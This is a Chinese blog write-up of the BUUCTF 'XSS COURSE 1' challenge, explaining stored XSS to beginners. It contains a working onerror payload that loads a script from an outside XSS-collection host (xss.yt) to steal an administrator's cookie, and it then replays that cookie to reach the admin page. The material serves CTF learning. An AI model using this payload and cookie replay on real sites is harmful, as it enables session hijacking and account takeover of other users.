BUU XSS COURSE 1 wp XSS平台在线注册

前言:啊啊啊啊!我蚌埠住了,在网上找的wp就一个两个的,跟着做,作为一个pwn手web萌新理解起来十分不友好,还没通,非常生气,学了一会,自己做通了。于是开始打算自己写个wp给后人,让后面的萌新能够理解的更透彻,少走我的弯路淦。

咱就是从这个题目入手吧,打开之后是这个界面
在这里插入图片描述
根据题目提示,有xss注入相关内容,查看登录,发现走不通,于是从这个吐槽入手。
输入

<script>alert(1)</script>

测试一下
在这里插入图片描述
发现没有文字,是不正常的现象。但是也没弹窗,说明存在漏洞,但是可能script被屏蔽了
输入

<img src="#">

在这里插入图片描述

发现有个图片标志,说明存在漏洞
在这里插入图片描述

则判断存在注入点,XSS注入攻击是一个很大的类,这里我仅从这题出手,这题目是存储型XSS,相关知识自行搜索。参考
具体原理就是相当于我们将我们的木马放到这个网站上了,当别人访问这个网站,我们的木马就会窃取他的cookie等相关信息。这里就是偷取了管理员的cookie

具体操作就是
先通过吐槽框将我们的payload 提交到服务端,服务端会将这个数据保存并显示在留言板上,只要有人访问这个留言板,就会触发我们的代码。

我们的payload 通过在标签中(例如head,body)添加我们自己的XSS平台的javascript源,即每当有人访问留言板就会触发我们的payload 并且会引入我们的JS文件。

这里就提到一个重点了,自己的XSS平台,这个东西兄弟们可以理解为一个远程木马服务器,如果有访问,我们的服务器上就会获取他的信息。

那么我们应该如何搭建自己的"木马服务器"呢,这里其实网上都有教程,不过需要内网穿透,而我们老白嫖怪了,网上有个免费的在线xss测试平台,这里把链接放出来XSS平台
大家自行注册,登录进去后,大家先创一个项目
在这里插入图片描述
项目中勾取这个代码
在这里插入图片描述

点击查看代码
在这里插入图片描述
如果你读过别人的wp你会发现有个东西很像别人的代码,就是这里
在这里插入图片描述

<img src=x οnerrοr=s=createElement('script');body.appendChild(s);s.src='//xss.yt/SFTX';>

代码具体意思就是
它使用>标签的onerror事件来执行一个JavaScript代码块。当图片加载失败时,onerror事件将被触发,从而执行该代码块。该代码块创建了一个script元素,并将其src属性设置为//xss.yt/SFTX。然后,它将该元素添加到文档的头部。这意味着,当页面加载时,该脚本将被下载并执行,从而允许攻击者注入恶意代码并执行任意操作。
我们复制此代码提交
在这里插入图片描述
再访问
在这里插入图片描述
在这里插入图片描述
我们发现
在这里插入图片描述
已经成功植入代码
回到项目内容查看
在这里插入图片描述
发现2个头
在这里插入图片描述
在第二个头中我们发现了admin的cookie以及url
在这里插入图片描述

于是我们构造包,访问http://c1ca7eb7-d615-4731-893e-33ae9f28ce2a.node4.buuoj.cn:81/backend/admin.php
ps:可以类比推理出这个文件位置
如果cookie不对,它会显示这个
在这里插入图片描述
把cookie改掉为admin的
在这里插入图片描述

获取flag
在这里插入图片描述

  • 6
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Steins;G4te

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值